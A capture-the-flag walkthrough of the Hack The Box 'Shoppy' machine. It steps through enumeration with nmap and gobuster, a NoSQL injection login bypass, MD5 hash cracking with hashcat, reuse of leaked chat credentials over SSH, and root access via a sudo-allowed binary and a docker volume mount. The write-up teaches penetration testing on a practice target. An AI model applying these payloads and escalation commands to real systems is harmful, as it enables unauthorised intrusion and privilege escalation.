As a first step added to the file /etc/hosts the IP address of the target to match the address: shoppy.htb.
Enumeration
Nmap
The Nmap scan shows that ports 22 (SSH), 80 (HTTP), and 9093 (Copycat) are open on the target.
nmap -sVC -Pn -T4 -p- shoppy.htb
HTTP
The page shoppy.htb has a timer, no clickable links, and no interesting content.
Gobuster
A directory search was performed with Gobuster with the command:
gobuster dir -u http://shoppy.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Gobuster found an available directory: /login.
Foothold
Shoppy.htb/login has an Admin login page.
Tested whether the login field is vulnerable to NoSQL injection by entering the username: admin’||’1=1
(password can be anything).
Logged in successfully. The admin page shows the product listing and the clickable link at the top right: “Search for users”.
Typed again in the user search field: admin’||’1=1
A link appeared on the page: “Download export”.
Clicked on the link “Download export”, and a new page opened, where you can see the password hashes of users admin and josh.
Hashcat
Copied user josh’s password hash to file hash.txt. The hash is encrypted with the MD5 encryption algorithm. Next, we crack the password using Hashcat.
Started Hashcat with the command:
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat cracked user josh’s password: remembermethisway
Admin’s password hash was uncrackable with the rockyou wordlist.
Gobuster
Subdomain directory search for shoppy.htb using Gobuster with the command:
gobuster vhost -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u shoppy.htb
Gobuster found the subdomain: mattermost.shoppy.htb.
Added mattermost.shoppy.htb to the file /etc/hosts to match the target IP address.
There is a login page at mattermost.shoppy.htb.
Successfully logged in as user josh with password: remembermethisway
The page is an instant messaging application with four different chat channels.
From the chat channel Deploy Machine, we can see a message from jaeger, where he/she mentions the username jaeger and the password: Sh0ppyBest@pp!
The discussion also mentions that docker is used in the deploy machine.
SSH
Since port 22 is open at the target, SSH connection was successfully made as user jaeger with password: Sh0ppyBest@pp!
ssh jaeger@shobby.htb
The user flag was found in the directory: /home/jaeger
Privilege Escalation
Checked with the command sudo -l, which commands the user jaeger can execute on the target as sudo. We can see that the command: deploy /home/deploy/password-manager can be executed as sudo.
In the directory /home/deploy, we can see an executable program: password-manager.
cd /home/deploy/
Opened the content of the file password-manager. There is an interesting text: Please enter your master password:SampleAccess granted!
cat password-manager
Executed the file password-manager with the command:
sudo -u deploy /home/deploy/password-manager
Entered the password: Sample. Now we see username: deploy and password: Deploying@app!
Successfully changed to user deploy.
su deploy
Because we noticed from the discussion between jaeger and josh that Docker is in use on the target, changed to root user with the command:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
The root flag was found in the directory: /root.